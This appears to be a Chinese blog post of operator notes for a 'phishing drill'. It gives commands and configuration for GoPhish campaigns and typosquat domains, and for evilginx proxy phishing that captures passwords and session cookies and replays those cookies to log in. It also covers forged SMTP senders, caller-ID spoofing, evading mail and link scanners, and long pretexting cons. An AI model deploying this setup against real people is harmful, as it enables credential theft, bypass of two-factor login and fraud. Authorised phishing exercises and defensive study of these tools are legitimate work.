钓鱼演练

钓鱼演练

  • VPS
    Digital Ocean:https://www.digitalocean.com/
    设置账单与账单警告(Setting Up Billing 和 Billing Alerts)
    Ubuntu Droplet:VPS商提供 DigitalOcean 提供的 Ubuntu“预制菜”
    wireguard windscribe:https://windscribe.com/

  • OSINT
    通过OSINT扒拉邮箱账号,钓鱼演练找客户要即可
    https://whatcms.org
    https://builtwith.com
    amass enum -v -d demo.com

  • 克隆登录页
    用户名枚举:识别用户名可用或密码错误

  • 域名选择
    错别字(含Unicode):dem0.com
    子域名技巧:admin-demo.com
    替换TLD:demo.co
    购买域名:Namecheap,https://www.namecheap.com

  • G Suite域名配置
    原名G Suite:现今叫做Google Workspace
    Google Workspace配置企业域名:生成TXT记录(HOST,值,TTL),cname记录,MX记录

  • GoPhish
    类似于nuclei一把梭:https://getgophish.com/
    nano config.json:admin_server管理后台(参考值:0.0.0.0:3333),phish_server钓鱼后台(参考值:0.0.0.0:80)
    配置证书并启动 GoPhish:

apt install certbot
certbot certonly -d dem0.com --manual --preferred-challenges dns --register-unsafely-without-email
注意报错提示:缺少什么TXT记录,回到Google Workspace中补上
记录好:fullchain.pem与privkey.pem

nano config.json:phish_server(参考值:cert_path:fullchain.pem ; key_path:privkey.pem),listen_url(参考值 0.0.0.0:443),use_tls(参考值 true)
./GoPhish:运行后得到管理后台账号密码(记录好)
UP主推荐:https://github.com/TeneBrae93

你好 {{.FirstName}},请点击钓鱼链接 {{.URL}}

GPT(代指一切“豆包”们):帮我创建一封邮件--把HTML发给我

  • 配置着陆页
    捕获密码与重定向到原网站

  • 添加目标用户
    Excel攻防工程师一把梭

  • 创建发送策略
    Google Workspace配置企业域名:账号需要设置二次认证(用于生成应用密码,类似于国内SMTP服务的一次性密码)
    谷歌SMTP开启或申请
    SMTP From可伪造
    图片

-N 不执行命令(不支持shell),-R 反向代理:意指上图的host值访问本地2525反向的抓取内容推送到smtp-relay.gmail.com:587
ssh -N -R 2525:smtp-relay.gmail.com:587 root@vpsip  

./evilginx
config domain dem0.com
config ipv4 external VPSIP

参考wordpress.org.yaml中的值添加A记录
A记录 login VPSip
A记录 make VPSip
A记录 profiles VPSip

VPS:放入wordpress.org.yaml文件

cd phishlets/

wordpress.org.yaml文件:

# For a self-hosted WordPress site, you'll probably want to define the
# `login` dictionary here as follows:
#
# ```yaml
# login:
#     domain: 'self-hosted-domain.com'
#     path: '/wp-login.php'
# ```
#
# Some WordPress plugins, such as WooCommerce, change the URL of the
# login page. You'll want to examine the specific site for this.
login:
    domain: 'login.wordpress.org'
    path: '/'

重启 ./evilginx
evilginx语法:

phishlets
exit
./evilginx
出现 wordpress.org 即加载yaml文件成功
phishlets hide example
phishlets
phishlets hostname wordpress.org VPS钓鱼域名
phishlets enable wordpress.org
会出现一堆war blacklist请求功能用于在钓鱼期间针对特定 URL、IP 或请求特征进行封禁或过滤。(可以直接无视)
注意出现inf ssuccessfully set up all TLS certificate
注意出现inf created lure with ID: 0

lures get-url 0
出现钓鱼链接自己进行测试,输入账号密码看看
后台 ./evilginx 进程吐出捕获的账号密码
sessions 查看捕获的账号密码  (只出现远程IP,无跟踪与统计功能)

nano hacksmarter.yaml
./evilginx
phishlets disabled wordpress.org
phishlets hide wordpress.org
phishlets
phishlets hostname hacksmarter VPS域名
phishlets enabled hacksmarter
lures
lures create hacksmarter
lures
lures get-url 1
出现钓鱼链接自己进行测试,输入账号密码看看
后台 ./evilginx 进程吐出捕获的账号密码
sessions 查看捕获的账号密码  (只出现远程IP,无跟踪与统计功能)
  • session cookies
    ./evilginx
sessions 2  出现键值对,其中有cookies
浏览器替换存储中的cookies键值对进行登录验证

  • 利用已知服务(可信服务,就地取材,大陆上生活,红队C2同理)
    提高交付
    绕过邮件过滤器和链接扫描器
    利用用户的信任
    模仿现实APT战术
    邮件基础设施及服务:google workspace;Microsoft 365;SendGrid/MailGun/SES
    核心思维:大量企业使用第三方邮箱服务,钓鱼演练也用它们(谷歌阿里腾讯等企业邮箱)
    可信payload交付(即C2 IOC为国内第三方可信服务商:腾讯阿里等知名读写功能点比如论坛;研判的C2链接第一眼看过去全都是第三方可信域):Dropbox/Google Drive/OneDrive;Discord CDN/Slack File Share;SurveyMonkey/Google Forms

  • 构建可信的基础设施
    人与技术可信,目标:合法商业
    影响:垃圾邮件过滤器;链接扫描;收件用户怀疑论
    域名声誉:干净的域名;使用企业详情资料注册;开启SPF,DKIM,DMARC
    邮件基础设施预热:第一天不要发邮件;先从测试邮件发起;新闻风格养号(类似于所有企业邮箱订阅后的风格);使用"Mailwarm"来自动化,“预热,养号”
    预剧本电话预热(Pretext Calling):把自己当成“销售与活动策划”,给用户电话或现场洗脑,“车企活动,优惠活动可能会发邮件领取”
    有效剧本(与社工同理):用户相信眼见为实,铺设台子,放置礼品,现场拉表演拉活动,花一两年时间真运营,最后“杀猪”

  • 设置SpoofCard
    伪造来电显示:https://www.spoofcard.com/

  • 设置Google Voice
    https://voice.google.com/signup

  • 实际项目
    IaC(Infrastructure as Code)设置:基础设施即代码(IaC)
    自动配置DNS和证书
    OSINT/侦查工具箱:侦查python脚本;自动生成报告
    phishlets自定义已知平台;脚本创建自定义phishlets
    完整社工报告:完整渗透(pentest)/安全评估(SE)报告

posted @ 2026-04-08 20:36  sec875  阅读(15)  评论(0)    收藏  举报